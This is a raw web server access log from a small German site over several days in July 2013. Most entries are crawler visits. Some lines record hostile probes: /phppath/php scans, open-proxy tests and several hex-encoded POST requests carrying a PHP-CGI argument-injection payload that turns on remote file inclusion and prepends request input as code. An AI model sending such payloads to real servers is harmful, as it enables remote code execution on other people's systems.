65.55.24.217 - - [03/Jul/2013:16:03:08 +0200] "GET / HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.55.24.217 - - [03/Jul/2013:17:03:32 +0200] "GET /robots.txt HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.55.24.217 - - [03/Jul/2013:17:57:38 +0200] "GET / HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
84.38.65.176 - - [03/Jul/2013:18:25:46 +0200] "GET / HTTP/1.0" 200 1229 "http://www.backlink-webkatalog.de/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12 GTB7.1 (.NET CLR 3.5.30729)"
144.76.69.142 - - [03/Jul/2013:21:18:35 +0200] "GET /robots.txt HTTP/1.1" 404 333 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
144.76.69.142 - - [03/Jul/2013:21:18:35 +0200] "GET / HTTP/1.1" 206 1229 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
46.229.164.101 - - [03/Jul/2013:21:46:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; SemrushBot/0.96.3; +http://www.semrush.com/bot.html)"
209.190.1.133 - - [03/Jul/2013:21:48:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1) KomodiaBot/1.0"
141.8.147.12 - - [03/Jul/2013:21:50:50 +0200] "GET /robots.txt HTTP/1.1" 404 327 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
65.55.24.217 - - [03/Jul/2013:22:25:21 +0200] "GET /robots.txt HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.55.24.217 - - [03/Jul/2013:22:42:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
69.171.237.9 - - [03/Jul/2013:23:20:44 +0200] "GET / HTTP/1.1" 206 1229 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
207.241.226.239 - - [03/Jul/2013:23:31:05 +0200] "GET /robots.txt HTTP/1.1" 404 320 "-" "ia_archiver(OS-Wayback)"
65.55.24.217 - - [04/Jul/2013:00:27:34 +0200] "GET /robots.txt HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.55.24.217 - - [04/Jul/2013:01:06:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
209.190.1.134 - - [04/Jul/2013:03:38:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1) KomodiaBot/1.0"
141.8.147.12 - - [04/Jul/2013:03:45:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
141.8.147.12 - - [04/Jul/2013:06:55:27 +0200] "GET /robots.txt HTTP/1.1" 404 337 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
66.249.78.157 - - [04/Jul/2013:07:22:57 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.157 - - [04/Jul/2013:07:22:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
144.76.71.140 - - [04/Jul/2013:08:31:28 +0200] "GET /robots.txt HTTP/1.1" 404 328 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
144.76.71.140 - - [04/Jul/2013:08:31:29 +0200] "GET / HTTP/1.1" 206 1229 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
65.55.24.217 - - [04/Jul/2013:09:32:11 +0200] "GET /robots.txt HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.55.24.217 - - [04/Jul/2013:09:47:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
217.69.133.67 - - [04/Jul/2013:11:41:22 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)"
111.223.90.242 - - [04/Jul/2013:11:45:33 +0200] "GET /phppath/php HTTP/1.0" 404 312 "-" "-"
111.223.90.242 - - [04/Jul/2013:11:45:33 +0200] "GET /phppath/php HTTP/1.0" 404 312 "-" "-"
111.223.90.242 - - [04/Jul/2013:11:45:33 +0200] "GET /phppath/php HTTP/1.0" 404 312 "-" "-"
111.223.90.242 - - [04/Jul/2013:11:45:33 +0200] "GET /phppath/php HTTP/1.0" 404 312 "-" "-"
111.223.90.242 - - [04/Jul/2013:11:45:33 +0200] "GET /phppath/php HTTP/1.0" 404 312 "-" "-"
111.223.90.242 - - [04/Jul/2013:11:45:33 +0200] "GET /phppath/php HTTP/1.0" 404 312 "-" "-"
111.223.90.242 - - [04/Jul/2013:11:45:33 +0200] "GET /phppath/php HTTP/1.0" 404 312 "-" "-"
111.223.90.242 - - [04/Jul/2013:11:45:33 +0200] "GET /phppath/php HTTP/1.0" 404 312 "-" "-"
111.223.90.242 - - [04/Jul/2013:11:45:33 +0200] "GET /phppath/php HTTP/1.0" 404 312 "-" "-"
111.223.90.242 - - [04/Jul/2013:11:45:33 +0200] "GET /phppath/php HTTP/1.0" 404 312 "-" "-"
141.8.147.12 - - [04/Jul/2013:11:50:01 +0200] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
194.153.113.7 - - [04/Jul/2013:11:58:05 +0200] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; oBot/2.3.1; +http://filterdb.iss.net/crawler/)"
141.8.147.12 - - [04/Jul/2013:12:39:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
194.153.113.7 - - [04/Jul/2013:13:17:43 +0200] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; oBot/2.3.1; +http://filterdb.iss.net/crawler/)"
88.198.40.163 - - [04/Jul/2013:14:14:55 +0200] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
88.198.40.163 - - [04/Jul/2013:14:14:55 +0200] "GET / HTTP/1.1" 206 1229 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
157.55.33.113 - - [04/Jul/2013:15:11:23 +0200] "GET /robots.txt HTTP/1.1" 404 328 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.55.213.73 - - [04/Jul/2013:15:14:45 +0200] "GET /robots.txt HTTP/1.1" 404 320 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.213.73 - - [04/Jul/2013:15:14:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
157.55.33.113 - - [04/Jul/2013:15:25:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
141.8.147.12 - - [04/Jul/2013:15:32:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
144.76.71.241 - - [04/Jul/2013:18:24:52 +0200] "GET /robots.txt HTTP/1.1" 404 337 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
144.76.71.241 - - [04/Jul/2013:18:24:52 +0200] "GET / HTTP/1.1" 206 1229 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
157.56.92.153 - - [04/Jul/2013:19:12:21 +0200] "GET /robots.txt HTTP/1.1" 404 337 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.56.92.153 - - [04/Jul/2013:19:37:47 +0200] "GET / HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
64.79.77.38 - - [04/Jul/2013:20:07:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1) KomodiaBot/1.0"
64.79.77.35 - - [04/Jul/2013:20:11:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1) KomodiaBot/1.0"
64.79.77.35 - - [04/Jul/2013:20:17:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1) KomodiaBot/1.0"
64.79.77.37 - - [04/Jul/2013:20:19:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1) KomodiaBot/1.0"
194.153.113.7 - - [04/Jul/2013:20:44:12 +0200] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; oBot/2.3.1; +http://filterdb.iss.net/crawler/)"
194.153.113.35 - - [04/Jul/2013:21:26:24 +0200] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; oBot/2.3.1; +http://filterdb.iss.net/crawler/)"
64.79.77.38 - - [04/Jul/2013:21:28:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1) KomodiaBot/1.0"
64.79.77.36 - - [04/Jul/2013:22:27:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1) KomodiaBot/1.0"
141.8.147.12 - - [04/Jul/2013:22:27:42 +0200] "GET /robots.txt HTTP/1.1" 404 327 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
217.225.189.177 - - [04/Jul/2013:22:34:07 +0200] "GET / HTTP/1.1" 200 1229 "http://www.bigfinder.de/online-11.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
217.225.189.177 - - [04/Jul/2013:22:50:48 +0200] "GET / HTTP/1.1" 200 1229 "http://www.bigfinder.de/online-11.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
65.55.24.217 - - [04/Jul/2013:23:48:03 +0200] "GET /robots.txt HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.55.24.217 - - [04/Jul/2013:23:50:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
94.102.51.246 - - [05/Jul/2013:02:10:02 +0200] "GET http://24x7-allrequestsallowed.com/?PHPSESSID=7jy745aa00143SSQJ_W_EFBF%5C%40 HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0"
141.8.147.12 - - [05/Jul/2013:04:09:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
64.79.77.37 - - [05/Jul/2013:05:31:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1) KomodiaBot/1.0"
87.189.122.115 - - [05/Jul/2013:05:42:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 /Windows; U; Windows NT 6.1; de; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5"
87.189.122.115 - - [05/Jul/2013:05:42:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Java/1.6.0_22"
64.79.77.38 - - [05/Jul/2013:05:49:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1) KomodiaBot/1.0"
198.20.70.114 - - [05/Jul/2013:10:42:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
198.20.70.114 - - [05/Jul/2013:10:42:45 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "-"
87.139.69.171 - - [05/Jul/2013:10:51:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36"
87.139.69.171 - - [05/Jul/2013:10:51:23 +0200] "GET /favicon.ico HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36"
65.55.24.217 - - [05/Jul/2013:11:05:30 +0200] "GET /robots.txt HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.55.24.217 - - [05/Jul/2013:11:06:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
194.153.113.35 - - [05/Jul/2013:11:49:11 +0200] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; oBot/2.3.1; +http://filterdb.iss.net/crawler/)"
87.163.152.31 - - [05/Jul/2013:13:50:56 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0"
65.55.213.73 - - [05/Jul/2013:14:09:30 +0200] "GET /robots.txt HTTP/1.1" 404 320 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.213.73 - - [05/Jul/2013:14:09:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
195.60.76.78 - - [05/Jul/2013:14:47:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
64.79.77.36 - - [05/Jul/2013:14:56:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1) KomodiaBot/1.0"
83.133.125.202 - - [05/Jul/2013:17:26:46 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
83.133.125.202 - - [05/Jul/2013:17:26:46 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
83.133.125.202 - - [05/Jul/2013:17:26:46 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
5.9.125.26 - - [05/Jul/2013:19:04:44 +0200] "GET /robots.txt HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
5.9.125.26 - - [05/Jul/2013:19:04:44 +0200] "GET / HTTP/1.1" 206 1229 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
5.9.112.66 - - [05/Jul/2013:21:40:25 +0200] "GET /robots.txt HTTP/1.1" 404 327 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
5.9.112.66 - - [05/Jul/2013:21:40:26 +0200] "GET / HTTP/1.1" 206 1229 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
84.38.65.176 - - [05/Jul/2013:22:50:06 +0200] "GET / HTTP/1.1" 200 1229 "http://www.sumaja.de/" "T-Online Browser"
83.133.125.202 - - [05/Jul/2013:22:50:07 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
83.133.125.202 - - [05/Jul/2013:22:50:07 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
217.230.176.29 - - [06/Jul/2013:00:31:04 +0200] "GET / HTTP/1.1" 200 1229 "http://www.bigfinder.de/online-11.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FBSMTWB; ATC/1.0; .NET CLR 1.1.4322; ATC/1.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
178.77.126.55 - - [06/Jul/2013:00:47:33 +0200] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; CareerBot/1.1; +http://www.career-x.de/bot.html)"
178.77.126.55 - - [06/Jul/2013:00:47:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CareerBot/1.1; +http://www.career-x.de/bot.html)"
88.191.76.222 - - [06/Jul/2013:02:03:45 +0200] "GET /phppath/php HTTP/1.0" 404 312 "-" "-"
88.191.76.222 - - [06/Jul/2013:02:03:45 +0200] "GET /phppath/php HTTP/1.0" 404 312 "-" "-"
88.191.76.222 - - [06/Jul/2013:02:03:45 +0200] "GET /phppath/php HTTP/1.0" 404 312 "-" "-"
88.191.76.222 - - [06/Jul/2013:02:03:45 +0200] "GET /phppath/php HTTP/1.0" 404 312 "-" "-"
88.191.76.222 - - [06/Jul/2013:02:03:45 +0200] "GET /phppath/php HTTP/1.0" 404 312 "-" "-"
88.191.76.222 - - [06/Jul/2013:02:03:45 +0200] "GET /phppath/php HTTP/1.0" 404 312 "-" "-"
88.191.76.222 - - [06/Jul/2013:02:03:45 +0200] "GET /phppath/php HTTP/1.0" 404 312 "-" "-"
88.191.76.222 - - [06/Jul/2013:02:03:45 +0200] "GET /phppath/php HTTP/1.0" 404 312 "-" "-"
88.191.76.222 - - [06/Jul/2013:02:03:45 +0200] "GET /phppath/php HTTP/1.0" 404 312 "-" "-"
88.191.76.222 - - [06/Jul/2013:02:03:45 +0200] "GET /phppath/php HTTP/1.0" 404 312 "-" "-"
65.55.213.73 - - [06/Jul/2013:13:50:21 +0200] "GET /robots.txt HTTP/1.1" 404 320 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.213.73 - - [06/Jul/2013:13:50:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
188.190.98.18 - - [06/Jul/2013:14:48:43 +0200] "POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 404 321 "-" "Python-urllib/2.6"
46.229.164.101 - - [06/Jul/2013:14:58:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; SemrushBot/0.96.3; +http://www.semrush.com/bot.html)"
198.20.70.114 - - [06/Jul/2013:16:31:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
198.20.70.114 - - [06/Jul/2013:16:31:53 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "-"
157.55.32.114 - - [06/Jul/2013:18:22:17 +0200] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.32.114 - - [06/Jul/2013:18:23:39 +0200] "GET /Heizoel-Berlin.htm HTTP/1.1" 404 328 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
217.230.140.123 - - [06/Jul/2013:21:07:02 +0200] "GET / HTTP/1.1" 200 1229 "http://www.bigfinder.de/online-11.html" "Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 GTB7.1"
131.253.24.34 - - [06/Jul/2013:21:20:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
136.186.231.16 - - [06/Jul/2013:21:56:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
194.153.113.7 - - [07/Jul/2013:02:00:36 +0200] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; oBot/2.3.1; +http://filterdb.iss.net/crawler/)"
194.153.113.35 - - [07/Jul/2013:03:26:23 +0200] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; oBot/2.3.1; +http://filterdb.iss.net/crawler/)"
91.226.212.41 - - [07/Jul/2013:05:50:54 +0200] "GET http://www.proxy-alert.com/remote.php HTTP/1.1" 404 321 "-" "-"
157.56.229.184 - - [07/Jul/2013:06:10:07 +0200] "GET /robots.txt HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.56.229.184 - - [07/Jul/2013:06:11:03 +0200] "GET /impressum.htm HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
91.226.212.41 - - [07/Jul/2013:06:26:35 +0200] "GET http://www.proxy-alert.com/remote.php HTTP/1.1" 404 321 "-" "-"
157.55.32.187 - - [07/Jul/2013:06:37:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
91.226.212.41 - - [07/Jul/2013:06:52:23 +0200] "GET http://www.proxy-alert.com/remote.php HTTP/1.1" 404 321 "-" "-"
91.226.212.41 - - [07/Jul/2013:07:29:38 +0200] "GET http://www.proxy-alert.com/remote.php HTTP/1.1" 404 321 "-" "-"
91.226.212.41 - - [07/Jul/2013:07:51:05 +0200] "GET http://www.proxy-alert.com/remote.php HTTP/1.1" 404 321 "-" "-"
157.55.35.38 - - [07/Jul/2013:07:58:55 +0200] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.35.38 - - [07/Jul/2013:07:59:35 +0200] "GET /seiten/produkte_hzoel.php HTTP/1.1" 404 335 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
91.226.212.41 - - [07/Jul/2013:08:23:47 +0200] "GET http://www.proxy-alert.com/remote.php HTTP/1.1" 404 321 "-" "-"
91.226.212.41 - - [07/Jul/2013:08:55:08 +0200] "GET http://www.proxy-alert.com/remote.php HTTP/1.1" 404 321 "-" "-"
91.226.212.41 - - [07/Jul/2013:09:02:33 +0200] "GET http://www.proxy-alert.com/remote.php HTTP/1.1" 404 321 "-" "-"
157.55.32.187 - - [07/Jul/2013:17:40:30 +0200] "GET /robots.txt HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.32.187 - - [07/Jul/2013:17:41:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
64.246.161.30 - - [07/Jul/2013:19:53:07 +0200] "GET /robots.txt HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
64.246.161.30 - - [07/Jul/2013:19:53:07 +0200] "GET / HTTP/1.1" 200 1229 "http://whois.domaintools.com/aufzugs-hebetechnik.de" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
217.160.211.72 - - [07/Jul/2013:20:42:48 +0200] "POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 404 316 "-" "-"
217.160.211.72 - - [07/Jul/2013:20:42:48 +0200] "POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 404 316 "-" "-"
217.160.211.72 - - [07/Jul/2013:20:42:48 +0200] "POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 404 316 "-" "-"
217.160.211.72 - - [07/Jul/2013:20:42:50 +0200] "POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 404 316 "-" "-"
217.160.211.72 - - [07/Jul/2013:20:42:50 +0200] "POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 404 316 "-" "-"
